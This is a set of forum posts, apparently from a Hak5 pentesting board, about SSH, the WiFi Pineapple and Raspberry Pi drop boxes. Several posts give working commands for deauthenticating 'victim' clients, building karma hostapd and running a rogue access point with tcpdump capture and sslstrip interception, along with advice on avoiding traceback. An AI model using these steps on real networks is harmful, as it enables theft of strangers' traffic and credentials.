telot

ssh user@host Thats it. If you're switching ports and using keys, you're skipping to intermediate level without doing the beginner stuff. The most basic form of ssh is just what I put in above. That is where you should start if you're struggling. If you absolutely have to change the ssh port (and I don't blame you for a second), it'll look like this: ssh -p 8088 root@192.168.1.1 except with the port number you selected after the -p and your routers IP address after the @. I'm assuming that the router only has a root user as well - I'm not vividly familiar with dd-wrt. Enjoy! telot

That right there. Sorry logicalconfusion, theres no way to simply/elegantly accomplish what you're after. Theres just no off the shelf (open or closed source) product designed to do EXACTLY what you want. If you want it, you'll have to write it. Back to the thermite though, thermite is not explosive and doesn't necessarily have to set off the firealarm. It IS extremely dangerous, of course. There was a con where the challenge was to destroy a 2U server rack of harddrives without setting off alarms or damaging other clients stuff. And one guy successfully did it. I'll try to find the video and will update this post. If nothing else, its fascinating to watch. telot

http://www.dsd.gov.au/images/top35-table-2012.png Pretty interesting list. Overall its very thorough and I really like how they have the "Helps mitigate Intrusion" through the various phases. My biggest qualm with it is the fact that User Education is number 20. I would have put it in the top 5...so the list has a top 5 instead of a top 4. Top 4 list? I mean comeon telot

Here is a very simplified version of what may work for you: airodump-ng mon0 See the connected clients of the AP you want to bring to your router. aireplay-ng -0 10 -a BS:SI:ID:OF:TARGETAP -c MA:CA:DD:RE:SS:OF VICTIM mon0 The client specified with the -c option will be deauth'd and may connect to the pineapple instead. You'll have to do this for each client you want to bring over, but it will accomplish what you want (bring over clients from AP while not disconnecting you). telot

Being that 34 people have read this and no one has responded, I'll go with the assumption that you all don't know how often its used. How about I change my question then: Have any of you ever used chapcrack? Ever? telot

I was thinking along a similar line. I know all this stuff, and I've known it for years and years. If not for the decent production value I would've skipped this video after the first 2 mins. It was when they confronted that kid with his own pin issued by his bank, that I realized I'm not the intended audience, its that guy. The kid is even young and seems to be decently tech-knowledgeable. I mean, people who are REALLY hopeless with security, just won't buy this kind of stuff. They will go with their free printer that comes with the low end computer they buy once every 4-5 years. Its the people in the middle that are the dangers to themselves. They consider themselves tech-savvy, and maybe they kind of are. But their far from security-savvy, which makes for a very dangerous game of Russian roulette, with their information on the line. While the media hypes high-profile hacks on a weekly basis, no one is talking about personal computer security on the public stage. Maybe its about time someone does. telot

A proper cellular router is the most reliable and feature-rich way to get 3G to the pineapple, in my opinion. Theres two main brands, Sierra WIreless's Airlink and the Digi Connect Wan. I'm a fan of the Digi since it is much more easily configurable and it runs python. See: http://www.bressner.de/webdocs/DIGI%20CONNECT%20WAN%203G.JPG Its what I use and I'll never go back to "dongles" ever again. Having a full blown router as my gateway is so damn handy, plus I can power the pineapple from its usb port, easily/reliably attach high gain antennas, setup a vpn to tunnel all my victims traffic securely over the airwaves and web, man its just the best. I highly recommend it. As for price, they retail around $600-750. I know thats steep, but I've seen some pop up on ebay that go for $50. I bought mine for $75 from ebay. Hope this helps telot

Not really sure what you're asking. Does the pineapple still respond to probe requests? Yes of course. Mine is sitting next to me right now and, when I turn on my laptop (osx) boom, theres Toronto Pearson Airport wifi. Let me assure you, I'm far far far away from the Toronto airport right now. So yes, the pineapple still responds to probe requests. I think you asked if devices are sending them out differently - the answer is no. But what OS's do after they send out probe requests does differ and can change (afterall, its software). So like windows7 handles probe responses and insecure wifi much better than XP. I'm trying to remember the nuances right now, it might be that 7 will connect to a secure wifi with lower signal strength if its in range, whereas XP would just connect to the strongest signal no matter what? Something like that, anyways different OS's do absolutely handle probe requests (when they send them out) and probe responses (how they handle it when AP's "say yes"). That said, I don't think there have been any major changes to how any OS's do their probing or handle responses, so thats probably not the issue here. More likely, you had some good luck when you turned it on before, now you don't. I've noticed that good luck getting karma'd victims directly correlates with how target rich the environment is. In order to convince any of us otherwise, you'll have to do some scientific-like testing. Turn on the pineapple and let it bootup with karma autoenabled. Turn on an XP machine with a open ssid saved. Does it connect? How long does it take? Do this with 7, OSX, ubuntu, android, etc. Having a catalog of the behavior of different OS's could be really cool now that I think about it...Anyways, just saying that your pineapple "isn't what it used to be" doesn't give us much to go on by way of troubleshooting. telot

Haha, it was nice to refresh myself on your linux rants Apache! Welcome to the boards! Now get out of that ducky subforum and join us with the pineapple! telot

The pineaple takes from 5 to 12V DC. You can throw any amp rating at it, it will only take what it needs. Just don't go above 12V. As for the cable, I second Foxtrots suggestion. Just make one! Its super easy. Just make sure to have a voltmeter around to verify the polarity before you plug it in. Don't know what a voltmeter is? Do a merry jig, cause telot just gave you an opportunity to learn something. Cheers telot

Mi Amor! Downloading opera right now (haven't run it in years, but this would be reason to). Thanks digip! telot

Those are all good ideas digip, but I guess I should have explained myself a little better. I'm kind of hoping for a browser hack that will provide this functionality. The reason being, is I have a dozen or more tabs open at once, and I bounce between the different dashboards doing my work. Sometimes I spend 10 minutes on one dashboard, and then when I go to view another one, that I was in the middle of doing something on, and poof! I've been logged out. The solution would have to work with inactive tabs. Maybe I'm reaching here, and tbh, it's quite a first world problem if you ask me lol Thanks for the tips digip, I think I'll look into what I can do with the cron to keep hidden tabs alive. telot

Hey all - like a lot of admins, I use a lot of portals and dashboards for monitoring my network, servers, clouds, blah blah blah. Most of them feature Inactivity timers for security reasons. They don't want you to get up from your computer, have someone else sit down, and have access to these websites with admin credentials. Sounds good right? Well, I hate them. I diligently follow the best practice of always locking my workstation when I'm away from it. So I'm wondering if theres any known workarounds for these things. I've done some googling on the subject, but can only come up with code examples of how to apply an inactivity timer to a website, not how to circumvent them. Before I go looking though the javascript on each site to hack up my own workaround, I was hoping maybe some of you have a solution to this problem. I'd hate to reinvent the wheel, so if you know of anything that could help me out, I'd appreciate it. Thanks! telot

Thanks Seb! Looking forward to it! Any chance we can sneak an ETA out of you? :) telot

Great project Splicer! While we've seen several iterations of the pi as a dropbox, I've yet to see it paired with an LCD, nor have I seen the on-boot verification with python - both are very awesome additions to the typical 'load the pi up with tools and script them on after bootup' setup. One suggestion that comes to mind is to use some type of encryption (encfs should do the trick) so that when it is discovered by a victim, they can't trace it back to you. Adds a layer of security for you as the malicious attacker, or emulates what a malicious attacker would do if you're using this on a pentest. Without this encryption, anyone can boot it up and cat your python scripts to see the endpoint address, and that your username is twi7ch :) Overall excellent execution and excellent presentation. A+! telot

Dude, you are in need of chill. 1) Do you know the IP of your router? If you don't know the IP of your router and your running windows (as I assume you are, I tldr'd your post man, sorry). Hold down windows key and press the "r" button. Type in: cmd Type in ipconfig in your command window. If you're plugged into your network with a cable, look for Local Area Connection. Note the "Default Gateway". If you're connected via wifi, look for Wireless Lan Adapter and note the Default gateway. That is your routers IP address. Download putty and in the big Host Name field, type in the IP of your router and click Open Thats it. 2) ssh tunneling is a proxy. Other proxies might be specialized computers on an enterprise network. In this case, the proxy is on your computer. All proxies sit in between your browser (thats properly configured to use the proxy) and the internet. So with ssh tunnels, all the packets that make up you going to a webpage in your browser are encrypted on your computer before they hit the wire. Anyways, ssh is really really really easy for those of us who've been using linux for years. Its like, the most basic of things. If you've really watched every episode of hak5 AND paid attention, you'd know this stuff. The series of episodes on ssh spell it out in gory detail. Anyways, good luck telot

Hey guys - I know there's no metrics or anything, so I pose the question to you all. How commonplace is it for malicious sniffers to utilize chapcrack? Between arp poisoning, IDS, wifi pineapples, or just sniffing the air, there's a lot of pcaps being created out there. Of the malicious sniffers, how many are cracking mschapv2? The reason I ask is because a friend still uses pptp for his vpn's and for his wpa2-enterprise radius server. He claims that because pptp is so easy to deploy and compatibility is through the roof, and that chapcracks use is so rare, that its worth sticking with mschapv2. With Darren's recent episode on installing a pptp server (and subsequent episode apologizing and giving the how-to on openvpn) its got me thinking about the issue again. I mean, chapcracks been out for years now, and I almost never hear about it. Does the fact that you have to pay $20 to cloudcracker hinder its popularity? What do you think? telot

Planetsourcecode is pure awesomeness. I too would like to thank you for the link digip! Thats the second time one of your links has changed my life (the other being securitytube.net, years ago). whitehat: I'd love to see a public version of your code when your done - if you know ruby at all, you could even add it to metasploit! Knowing what the user is up to without doing screengrabs could be a very useful tool for meterpreter. telot

Finally a new and fresh contribution to the pineapple project! We've been lacking the last few weeks on new and exciting features (is it just me? or has the forums just been a fix-my-problem-athon lately?). Thanks very much Aranadin for your efforts and even more thanks for sharing. I will certainly be giving this a try soon. Keep up the great work! telot

Yep - the raspi-config is also oh-so-necessary for easily expanding the root fs to utilize your entire SD card telot

lol wat? telot

Checkout Kali for Raspberry Pi icedevil433. Its a lot more solid than pwnpi for some things. Plus apt-get'ting all those tools on a fresh rasbian install would be extremely painful...apt-get just takes forever on the pi! telot

Hey WM - you still working on this one? I'm curious if you're able to pass through traffic between the wans and also supply internet for karma. If so, I'd love to see your IPTABLES pwnage, as I'm working on doing exactly this with my raspberry pi. Thanks man! telot

Hey Zete: Heres the script I used to download the karma-patched hostapd. #/bin/sh # bootup Module setup script #leave this echo echo "## Apt-getting ##" apt-get install libnl-dev -y #leave this echo echo "## Compiling ##" if ! which /usr/local/bin/hostapd > /dev/null; then echo "### Installing hostapd-karma ###" >> cd /tmp wget http://www.digininja.org/files/hostapd-1.0-karma.tar.bz2 tar -jvxf hostapd-1.0-karma.tar.bz2 cd hostapd-1.0-karma/hostapd make && make install cd ~ hostapd -vv echo "### Installed hostapd-karma ###" fi #leave this echo echo "## Final Commands ##" # Enjoy - Leave me at Bottom - EOF Go into /etc/dnsmasq.conf and make sure interface=wlan0 and then uncomment/add this line: dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h And you may need to change some things around in the patched karma hostapd.conf file as well. I had to change my drivers to match my card, and changed the ssid to be broadcasted. interface=wlan0 driver=nl80211 ssid=FreeInternet channel=1 Then I made up a quick n dirty telotscript to start it all up: #!/bin/sh echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -j MASQUERADE cd /root/hostapd-1.0-karma/hostapd/ ./hostapd -B /root/hostapd-1.0-karma/hostapd/hostapd.conf tcpdump -i wlan0 -w /root/cap.pcap -n net 192.168.0.0/24 & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000 sslstrip -w /root/sslstrip.log & Theres nothing fancy about this install, theres no gui, theres no dancing fruit, but it does work and works well. Please keep in mind I did this several months ago and may have missed something. So if the instructions are really bad (and they very well could be haha) let me know and I can do a proper write up. But I think this should get you going in the right direction. telot

Yes Easily with a 3G dongle or (what I prefer) a 3G cellular router. If I recall, I just followed digininja's instructions on his site. They're not pi-specific, so I had to do some tweaking...I can fire it up and report back the exact config if you want. telot